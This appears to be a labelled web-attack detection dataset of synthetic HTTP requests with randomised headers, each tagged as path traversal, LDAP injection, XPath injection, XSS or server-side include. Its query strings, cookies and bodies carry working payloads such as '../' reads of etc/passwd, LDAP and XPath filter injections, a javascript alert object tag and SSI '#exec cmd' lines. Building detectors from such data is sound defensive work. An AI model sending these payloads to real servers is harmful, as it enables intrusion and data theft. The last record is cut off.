GET /0ZFVHGF/t10UiKzPJd/7ReDt/di/ful/kyryoKTj/en@vv0UOmxqw/tb9wnpsmAsw5E0Ro/znb/wuilgt.html?welsbadnrtReer=stot&eixtrgnAs=jaaiehlgnblgotOp&edIhnizhfskt=7766&hediHtseiitei=%29%28++++%7C++%28++cn%3D*o+%27brien*+%29%28mail+++%3D*o%27brien*+%29++++&Vewa9h7=%3Eonyueth&6nre=amdiv1abhals%3BobP&1omvNe9ebt3edej=8eo&jhommdx2yeel=seNita8h&-dYadminS=rbinU HTTP/1.1
Host: www.fnnansn.uk
Connection: close
Accept: application/zip;q=0.4, image/png;q=0.1, image/jpeg
Accept-Charset: x-mac-hebrew;q=0.7, windows-1255;q=0.2, euc-jp, x-mac-hebrew
Accept-Encoding: *
Accept-Language: sth6f-ootsoAni, e-Iiti, t-9;q=0.2
Cache-Control: only-if-cached
Client-ip: 116.63.205.12
Cookie: sne=41434943;tsnttn9slrttd6w=2gctanh6lh;nesiikrf=oxMyoWWGg
Cookie2: $Version="689"
Date: Mon, 06 Apr 09 02:24:30 CET
ETag: "WbPrN@xJVi3tQ@DS"
Expect: 2aro
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 13 Jun 09 05:20:33 CET
If-Unmodified-Since: Wed, 07 Jul 04 16:26:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: NTLM cnRlaUlFdTh5aGVubmNsYTB3QXRuczU0aHRhN2V3R3R3c2VFYQ==
Range: 4549-1
Referer: /fg4tibci.png
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: sTtn7WR http://www.e0rmmn.fr
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: HTTP/2.3 218.98.66.152, HTTP/1.1 164.28.196.222, 4.9 www.hoo0Rrt0.shtml
Transfer-Encoding: vh7ku; iyiate=zlwamth
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38335
Start - Id: 45345
class: PathTransversal
GET /9q5jA1tCF/lplhesn/y9SNZ4YYiyr5YrDH/spe6ftoDrnenwe/eU3EDYc-MH/r8Ro/8vD.DfKSuKw.js?inqmrrakadtTu=13&ysxeeiw=erA&ih12=iUitH%40jKMDg HTTP/1.1
Host: www.xir2.org:80
Connection: eboe
Accept: */*
Accept-Charset: cp-950, x-mac-icelandic, euc-cn, iso-2022-jp;q=0.2, x-mac-arabic;q=0.1
Accept-Encoding: gzip;q=0.6, deflate, gzip, gzip;q=0.8, deflate;q=0.9
Accept-Language: ab-m;q=0.2, j-e9, 4-g4utesa;q=0.1, s-oz;q=0.7
Cache-Control: no-transform
Client-ip: 89.18.195.221
Cookie: dmna3rweErSeib=../../../WINDOWS/autoexec.bat;ewevasesl=eIe 
Date: Wed, 23 Apr 08 09:58:18 CET
ETag: "JRvpYZVwOVHopTG"
From: Rone@ihnrRe.fr
If-Unmodified-Since: Wed, 29 Jun 05 05:01:57 CET
If-Match: *
If-Range: *
Max-Forwards: 415
MIME-Version: 9.3
Pragma: 5hslTioo='dyie'
Proxy-Authorization: Digest username="e62etsm"
Authorization: aNtti7 caetseen=romih3
Referer: http://www.ztmwn.be/aeotqaoe/outTrw/uhite5tr/bgcoia.wmn
TE: gzip;q=0.3
Trailer: TE
User-Agent: teobwuoo
UA-OS: Windows NT
UA-Pixels: 8431x403
Via: 2.5 75.95.141.92, HTTP/0.1 www.qgiscsna.js:5427
Transfer-Encoding: identity
----: ---------------------------------------------

null

End - Id: 45345
Start - Id: 44954
class: PathTransversal
GET /1iote8rtejog/e0/oluadoenez.mspx?2udeco2eticer=lbi%3Dlth+irformftpznAaaeJ&sXnlOL6wh5=s7-v8tc&4eio=fWsrcdlc&erNr=1nopderXhenethrmz&rdsnngs=hubaephn7j&smeio=file%3A%2F%2F%2Fg%3A%2Fetint%2Ft0h0e%2Ftdne.xml&rNrel6irs=ar-&lszNaseigtn=35666179&tgE=7052 HTTP/1.0
Host: www.tfqfhr.biz
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, x-mac-korean;q=0.7, iso-8859-6, iso-8859-7;q=0.5, iso-8859-8
Accept-Encoding: deflate;q=0.5, gzip
Accept-Language: ebee-tteeh
Cache-Control: no-cache
Client-ip: 132.242.52.39
Cookie: H5f5Mqvcats=jxiRtmu;abwmfdtsout9eoT=mI+r
Cookie2: $Version="009"
Date: Fri, 07 Nov 08 16:37:50 CET
ETag: W/"aALg1_G.AL9vGMm"
Expect: omotegt
If-Modified-Since: Sun, 28 Mar 10 10:48:02 GMT
If-Unmodified-Since: Fri, 30 Nov 07 04:34:51 GMT
If-Match: "7DZNf81oAYIfxPIXFaN"
If-None-Match: "iQ7FoCUhFbkVaQymC"
If-Range: *
Max-Forwards: 825
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: /ctcgX/22Il/w4ivdGah/3tlird.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.4 (X11; U; Unix 3.9; ln-ag; rv:7.7.6) Gecko/20108095
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 298x509
Via: HTTP/8.7 www.onda.css
Transfer-Encoding: compress
Upgrade: nsi/5.0
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44954
Start - Id: 38755
class: LdapInjection
GET /6Cnph-ZP7/1-xDm/deHts/3or@8/6bin/mEdioscoCdTed7eor/8hisnino.jsp?8eiyRH=7ns5eAdio&VDBSTYYHz=ovHHd1tcNO&yeoxsht85=teee%29%28%26%28objectClass+++%3D+st0m*%29&in=er%40PPXSL2s&.prq=84&eEet=srbRTalocationicrawetc&xpctr=509546&lwnt=05&systemHphpd_b7passwdbiframey=noabn&t8eieeD6c=nee&arDa5artwTFggD3=iALu&tnl4n=813755&ksadnhlauIhy2=o%3FetRoSsmwea&mticoehhl6n=mynhal+ts&sg0acn=oh%2B HTTP/1.1
Host: 51.68.91.60
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1257, iso-8859-4, iso-8859-6;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-stale=44145
Client-ip: 111.176.120.104
Cookie: Etrd=nz;reah0TsoTdl=ded;eOoanxseSeHj=ftstpasswd;Oraofeoh1Xsofob=mlatt o0execrreetl;ecn3AhsgF1sG=i2ra
Cookie2: $Version="4"
Date: Sun, 14 Sep 08 23:47:44 GMT
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Basic dGVsYTpxdGNy
Range: -6168,6-
Referer: /tohhw03/ghEus1/Ryj1a.pdf
TE: trailers,chunked,chunked;q=0.0
Trailer: Date
User-Agent: Mozilla/8.0 (X11; U; Unix 4.5; pe-Mt; rv:2.4.5) Gecko/98912057
UA-CPU: Sparc
UA-Disp: 8384,101,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8698x991
Via: 3.8 www.radF02E.jpeg, 6.5 www.PfasqUst.gif, FTP/3.6 37.55.126.58
Transfer-Encoding: notx
Upgrade: eihbsv/2.5, adsr/9.3, od6ng/8.7
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 99237184639
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38755
Start - Id: 36370
class: PathTransversal
GET /rEZVc3PwutAxSvLie3ZX/nd/5pE@Rv-9YN0EgauO.dll?oouheonh3l5v=1%29ifyne0h&tdntgdi5hlefbme=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&SYhMM3sL2D=t%25uUadmin%7Ci%25cdUi HTTP/1.0
Host: 29.243.15.105:80
Connection: doyd
Accept: text/*, audio/*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: compress, deflate;q=0.0, deflate, identity;q=0.6, identity;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-age=5
Date: Thu, 02 Feb 06 16:30:03 CET
If-Unmodified-Since: Fri, 04 May 07 14:27:37 GMT
If-None-Match: "o-DShPaKgfJlQL96"
Referer: http://www.ixdpoep.be/9ean0/gizSm0.js
User-Agent: Mozilla/9.1 (Windows; U; WinNT 9.3; tm-uh; rv:7.3.7) Gecko/19641553
Upgrade: oratu/7.4, eix7mH/1.0, Otv/7.7

null

End - Id: 36370
Start - Id: 49114
class: XPathInjection
GET /0eIJ/egF/tlShAP@HgqY2Z4mTd/usrrt/l1pKs0nlZ1wGK9.gif?af2sfp=3+++++or+++++lg%2Fn%2Fab%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D862%5D+++or++++313%3D&ejUaaeso=eEr&ng5i3Hnoasg1era=2&etoteNyarmgEbf=o0-K9cGWkSN&aandrfAhfmt=8694656&UQ45-ZJ=991&0mWhl=cdqGE4O7M1a&O-_netcatG2formGPI=adfsicz&tmrgngn=026522267&sgautoexech@formTU=srtmntvac&i88F.6ejc=4021730623&oHcvtinaal=bokini&1res3zD6=6&nHDb=l%3Buwd HTTP/1.1
Host: www.cca1zxi.org:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.0, windows-1252;q=0.1, iso-8859-15, x-mac-chinesetrad;q=0.4
Accept-Encoding: identity;q=0.6, gzip;q=0.1
Accept-Language: lneo-njsrmuf;q=0.7, aonhsaic-c
Cache-Control: max-stale
Client-ip: 234.167.112.10
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Thu, 19 Feb 09 10:16:59 CET
ETag: "vzdQL-TvdBmv@UeHw"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Tue, 25 Jul 06 24:01:13 UTC
If-Unmodified-Since: Fri, 01 Jan 10 21:01:04 GMT
If-Match: *
If-None-Match: "Vo3O4eVy-ay8yAC8cR1"
If-Range: Fri, 12 Jan 07 11:01:56 GMT
Max-Forwards: 3
MIME-Version: 8.7
Pragma: haOIrmcn=d
Proxy-Authorization: Digest nonce
Authorization: Digest username="bddthp"
Range: 1-
Referer: /eTept.jsp
TE: chunked,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/8.4 (compatible; Konqueror/0.9; Win98; teaib; pl8iie; xtvblb7)
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: identity
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 0.51.163.102
X-Serial-Number: 2617169573
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49114
Start - Id: 38523
class: LdapInjection
GET /e6stpobywcsS1necbvlm/IT03B/Dsam2916Uz8PpasswdVF-/lJMZ5ftHFwXbG/ofEetdeksNtneGtr/tWdtJdkxNR0RlwXiW/nRliNttujrHtb/dlPFG5h/89.swf?lded=31874020&rNi11d9brhrsn=913&iae6bigyctv17yI=tS%24mochae&eggshncT=98&3xeN1=dsofou10adtsl&etqfrg=3140%29%28%26%28objectClass%3Dpfs%29%28%7C%28sn++++%3D+++GqEe%29%28cn%3Doro+J*%29%29&rnm=jW5Z&ttarDex=axneasarP7ety5&yaofnacyetergt=rfh57+meta&ej55=iqjrinhpsioI4ooa HTTP/1.0
Host: www.oidoihmdm.fr:618
Connection: wy0iaCdh
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 178.177.169.244
Cookie: EmJ8Jewp-t=Cnulltohe>+t a0w);pitsygbeeo4t2=fsaiaal;ealet=4779;csrsthelsilaz=663
Cookie2: $Version="13"
Date: Thu, 12 Nov 09 11:49:16 UTC
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Tue, 31 Jan 06 21:21:29 CET
If-Unmodified-Since: Tue, 02 Feb 10 03:36:16 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 702
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ue6yrirt"
Authorization: NTLM bWluYXQ2dHR0cWl0cEVpZnkwYW9ucmphZXdlaGlhMWVibkxzcmc=
Range: 548411-,-37195
Referer: http://www.HDaoQee9.net/Rein/s5Eye/aApesar/nmoeta.gif
TE: deflate;q=0.3,gzip
Trailer: Warning
User-Agent: ere5I0/2.4
UA-CPU: x86
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 1.4 www.2tohmsp.jpeg:2525, 8.3 56.150.54.160, FTP/8.1 1.222.205.253
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 149 www.nAoht.css "snts" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38523
Start - Id: 47074
class: XSS
GET /Uauor/w_M/2TqGQlZexecN/h_XrXU689oDYwKa_1_z/Xy3Aduso7lmRnY/telnetK/eVr@an/9mKzagII8dxKRRLKu4TP/mU8m9_Cgcpx2.mdb?rir4etyhseTt8dl=noMdtti1gl7so&YdoacVtt=eepaatuUleABht&9CoY2-O=gtsr&eaalhoe=%3Cobject+classid%3D+%22+++clsid%3A...+++%22+++codebase%3D+%22++javascript%3A%5Balert++++%28%277Ia4%27%29%3B%5D%22+++%3E&ec5tVipb=8650364&Hf7netei=227019223&00tyrwuet6aoq=%5C-hqad61%40qm&29G2oy=8eb0ne HTTP/1.1
Host: www.iNjemusn.net:44473
Connection: keep-alive
Accept: video/*;q=0.7
Accept-Charset: windows-874;q=0.9, x-mac-arabic, cp-932;q=0.9, windows-1257, iso-2022-jp;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 221.55.28.21
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="13"
Date: Sun, 21 Oct 07 20:29:44 GMT
ETag: W/"sdelRvzyys61VAh"
Expect: yshaae=hl6e2eC
From: ea8Dl2@Editdvt.it
If-Modified-Since: Tue, 06 Jan 09 15:26:36 GMT
If-Unmodified-Since: Wed, 12 Jan 05 21:28:27 UTC
If-Match: "lOIauZPvNPLfxM7aYL"
If-None-Match: "uF6UIoGQBhrikBCxgT"
If-Range: Sat, 19 Mar 05 03:42:43 GMT
Max-Forwards: 111
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Nnphc2l0b2hlbWVJc2k2eGh0cmUyYThvb3NUcndzZXJj
Range: 44535-
Referer: /oknrdlon/cueya/0demabto/tsotiya.bin
TE: chunked
Trailer: Via
User-Agent: oAPKTRQZ1 http://www.91iherW.de
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: rar/9.8 239.128.120.38, FTP/9.7 www.caih.htm
Transfer-Encoding: compress
Upgrade: helf/2.2
Warning: 684 180.130.213.236 "aaSnnnneul" "Fri, 29 Jan 10 11:30:08 GMT"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47074
Start - Id: 40275
class: SSI
GET /vnNh/hSgRsqkA1CL/nEt1Axttno8uuwe.php3?ssiNedN1o=23717587&scczt=tHz0KNYQIjrx&qLyXjH=urt&7group by1FL=fod%3Djigozoiasa&laennhrranipmr=qlamec&onkdpTense=76245&TzmuerajbzS=oh3o%5Czc%26autoexec+4tA&Sn=se2eow%3A&lo=%3C%21--++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5Cooa%5CtaauRe%5Crkloespr.exe+++d%3A%5Csey%5Cwww.seasdegeri.org%5Csarst6zEt%5Cdatabase.mdb+%2Fx++exporttofoxpro%22--%3E&tRc4ra=7728&cT1j=i HTTP/1.0
Host: 217.186.227.126:733
Connection: whdi0gZa
Accept: video/*;q=0.3
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: mseg0o-eU;q=0.3, oopyca-deto;q=0.1, o-rienkz, 5ap37Itd-i
Cache-Control: min-fresh=109
Client-ip: 230.236.181.10
Cookie: uihp=%;ele0onAsa1alsu=eIuE~window.openod tto3execowanxaccept;AwcsAivoalte=4115574183;pdvaLetooseza=opmntshtpinOae
Cookie2: $Version="114"
Date: Sat, 21 Feb 04 03:42:25 GMT
ETag: W/"PvC@pDiEamK-qycb0"
Expect: eAae
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sat, 22 Oct 05 03:31:29 GMT
If-Match: *
If-None-Match: "zUs4n7y9dmzljtr"
If-Range: *
Max-Forwards: 18
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest nc=4FCdffE7
Range: 1030-
Referer: http://www.n5iee.com/8rrirdb.tiff
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/9.4 (X11; U; Linux i586 1.4; pD-id; rv:8.6.2) Gecko/42086612
UA-CPU: MIPS
UA-Disp: 547,1126,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 9.1 182.106.152.109:12239
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40275
Start - Id: 36904
class: LdapInjection
POST /dodIslnaonslwhoee.htm? HTTP/1.1
Content-Length: 286
Content-Language: aX
Content-Encoding: deflate
Content-Location: /ntwo/eonlritr/ae3ini/haoeh5x.asp
Content-MD5: aWZoaWVmc3ZhaTdvWWE5aA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Aug 08 05:03:37 CET
Last-Modified: Wed, 22 Sep 04 05:10:12 GMT
Host: 224.1.172.141:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic, isiri-3342;q=0.5, iso-2022-jp
Accept-Encoding: *;q=0.3
Accept-Language: sesle4i-teaa;q=0.6, r-n2haecgr;q=0.8, ita-goerg
Cache-Control: cserch=oahgs
Client-ip: 16.173.236.24
Cookie: drsiaocnhn=connect;nEtalNe=tBopte>a;W@5phpupr=1;l9stdinPbaG0=2iEhc4
Date: Wed, 02 Jan 08 21:35:47 CET
Expect: otthrv
If-Modified-Since: Tue, 13 May 08 09:27:42 UTC
If-Match: *
If-Range: *
Max-Forwards: 31
MIME-Version: 8.2
Pragma: asM=tooe
Proxy-Authorization: Basic dTJlaTplcjNyY0hv
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: http://cns2.gov/tawnnLad/daorart/slra7y.pdf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/2.3 (compatible; MSIE 0.6; Linux i586; s2nf7Uuh; nqaboeskm; ee79cLN)
UA-OS: Win98
Via: HTTP/6.4 146.137.227.84, 3.4 www.iiEe7re.shtml, 5.2 www.wme1w.htm:75706
Transfer-Encoding: identity
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 128 59.175.65.205 "atelalsoarn" 

o-5vaoV9A=631&oslnomSiu=")(targetfilter=(o=NetscapeRoot))&E4zffhnlt=o7vhrh15eeegl&eab6u=8598&tofg1OutBi=5215869&s9e=69380536&rd=s8&nsefiariit=gqBzR_G&sfdeheBe=i&ieSuewhaentrn=s&uiLmid72YYo=1982195459&dse0aib38gsj4p=a0n&imAytz=1TUvsrXX.p9-&9tn=ialo1utuAegt&zaNsrenp7P=sfe

End - Id: 36904
Start - Id: 40191
class: SSI
GET /t6B7t@5e/iYDQX62H4WCWVUt5VVtJ/Yyf./nsenR/eMSYqskLa0XSXCE@B4P./oWFSE6jOk3eGv/stenu8NobsAAn/tdakctminanth8s/iu2ujqyb4y8.mspx?Wef=%3C%21--++++%23exec+cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2Fn9tnehkgf%2Fnsle1%22+++++--%3E&nrb8E=wPa7&sfboshkdhmdoit=sowp-&nqiii5ljt=4256019 HTTP/1.1
Host: www.eduee.com
Connection: fsch
Accept: application/*, image/png;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 95.143.38.157
Cookie: zy1OOAdhsp=erw
Cookie2: $Version="6"
Date: Sun, 01 Apr 07 06:06:27 UTC
ETag: W/"IY2@3WKoRmkzER6"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 19 Sep 07 06:30:23 UTC
If-Unmodified-Since: Mon, 06 Oct 08 05:15:08 CET
If-Match: "fFjwbtBjLsoGDrh-NV9s"
If-None-Match: *
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 0299
Pragma: Trmnt='otpq3s'
Proxy-Authorization: Digest nonce
Authorization: NTLM NWx2aGVlb2Q1bmN3NGVPZnNpcGh0YTB0dGFhaWU5dG5lOGZzdHQ3
Range: 95170-36663
Referer: http://www.hwdhlnsa.st/arzsd/yecfts/2laecai.jsp
TE: gzip;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: mies0pas1gl6iwc
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9646x716
Via: 0.6 40.35.35.122, 0.7 3.184.154.12, FTP/7.3 www.b1launrl.jpg:7515
Transfer-Encoding: identity
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40191
Start - Id: 37551
class: LdapInjection
PUT /hDojaTggitw/pgyddte2n/0aajeunb5/gdVN/sam0rs.htm? HTTP/1.1
Content-Length: 342
Content-Language: nSubr
Content-Encoding: identity
Content-Location: /6kme/noeTon/cort/s0smkiC/nsaf.pl
Content-MD5: dHJoaXphZTVhZXBuZm5zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Oct 06 15:56:33 UTC
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: www.6eafm6s.be
Connection: close
Accept: video/*;q=0.2, audio/x-wav, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 115.143.65.85
Cookie: oinnwnomunes=icSz;zEer1ue=ouqtqes1TT95s;mpHe=cVYYAZrwfYF7
Cookie2: $Version="00"
Date: Mon, 27 Dec 04 14:22:52 CET
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Tue, 29 Jul 08 03:45:53 CET
If-Unmodified-Since: Fri, 13 Mar 09 13:25:34 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "YP@y.S8NX6iOlAIr0"
If-Range: "OaSCl2XZAcNqtfde3N"
Max-Forwards: 38
MIME-Version: 7.0
Pragma: 3=htyeiftm
Proxy-Authorization: Basic bWZydGV3dDpvdGlp
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: -903027
Referer: http://www.wAKsEta5.it/seStwh/Iofane.tiff
TE: gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: CaotHeda/6.6.8
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1680x065
Via: 2.3 249.212.199.225, 2.7 www.En8p.js, sitihi/3.0 www.pTheOc.jpeg:37553
Transfer-Encoding: deflate
Upgrade: Uzteet/0.5, dhot7e/3.9, dtjlO/6.3, Whr/7.3, r5he/4.5
Warning: 384 59.186.228.229 "atuGyeetiitsHF" 
X-Serial-Number: 422853933254011
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nogqalamcu=097&ro0isuns=473939&f5agEhme1hgfd5I=a4WVa&oaeAovew1idythl=6258548&ne5eetqn3ayde=593)(&(objectClass=mcE)(|(sn=  iyv)(cn=sghs  J*))&skset=2448&ljp6l=86404838&endott1qs5r=wr5ara)&iresduepeeehs7=tL+script&vvX77=ims&tQaSnh=Dlreplace%u1&5ebrgomdce=e&Aveatpriwaa=aqtnhE1m5Yl&VJZRr=rJWh@QZuoL&m6=oUXfM

End - Id: 37551
Start - Id: 37933
class: LdapInjection
GET /acftssexSVeyapabhor.php3?bld2eaIsnejdre=cwevaltt%5C7ese&m2linkaBS_UNWf0=%28ge&dzECa421IoFsk=%5Ce%28o%5Diablce&oopmuro=d4xM&reitL=%29%28++++%7C+%28displayName%3Dhad*%29++%28name++%3D++++had*+++%29%28+++mail%3Dhad*+++%29&F_winntpSmY25=2.RL%403&iec7tsBan4=3795423&krestQwtn3vFc=4567&hy1Na4d1easp=fn9irmdht%3FabkiwAhE&yiowelvnai=ev%2F&allnE=5891497&ozn=e HTTP/1.1
Host: www.eflTttodi.uk
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-kr, iso-8859-7, hz-gb-2312, iso-2022-kr
Accept-Encoding: *
Accept-Language: e-89jttiOc;q=0.6, DhsraExu-og;q=0.5
Cache-Control: no-cache
Client-ip: 76.222.226.172
Cookie: aprheeebedke=0;aiulaifs7uco=onxaTqtyiHt2atSud;otqhlN=7266;hnnxmpzne=ersnhheMe;tihotieab5Tu=7329
Cookie2: $Version="6"
Date: Thu, 26 Feb 09 06:01:14 GMT
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: Rna7leoD
From: heal@ehrTn.gov
If-Modified-Since: Thu, 22 Jun 06 19:05:47 UTC
If-Unmodified-Since: Tue, 28 Aug 07 18:17:04 UTC
If-Match: *
If-None-Match: "9_-htGGY-ZI9ZD_nMOaJ"
If-Range: Tue, 19 Sep 06 13:15:13 CET
Max-Forwards: 390
MIME-Version: 8.6
Pragma: 7mHNHa=ee3eiba
Proxy-Authorization: skno0 leiotlhl=mslla
Authorization: ethp 2hhte=rcbs
Range: 92-
Referer: /qstyea/neQm01m/hiOsaot3/strqorta/thsEmiar.tiff
TE: chunked,trailers
Trailer: Upgrade
User-Agent: shohytjln/0.6.6.7.0
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.1 www.lspeuP.html, HTTP/3.6 www.napI2nwr.js, HTTP/8.3 www.n6i5ns.jpg
Transfer-Encoding: compress
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37933
Start - Id: 50029
class: XPathInjection
POST /edmOLsXjEyC_YVCE/9sseeseFnorueiens/taOZq3MyC.l9M/Ez41.Ckk/M2gK4wOEecA/Xn/iifhihomne/lXmRJcNbGw3udj.htm? HTTP/1.0
Content-Length: 197
Content-Language: oea,5ooce
Content-Encoding: gzip
Content-Location: /ocywEao/3cDmpTr/ihDtyoew/iqexos.mdb
Content-MD5: cnN4b29ydWVhaDRybmkyUw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Mar 09 05:28:50 CET
Last-Modified: Tue, 12 Dec 06 19:01:50 UTC
Host: 248.30.115.220:80
Connection: close
Accept: image/gif;q=0.9
Accept-Charset: *
Accept-Encoding: uer/xn/nipt/child::node()[position()=10]     or  'nimnRicn'    = '
Accept-Language: 8eap-bhxnRdtt;q=0.1, iNDntioe-rootiji
Cache-Control: no-transform
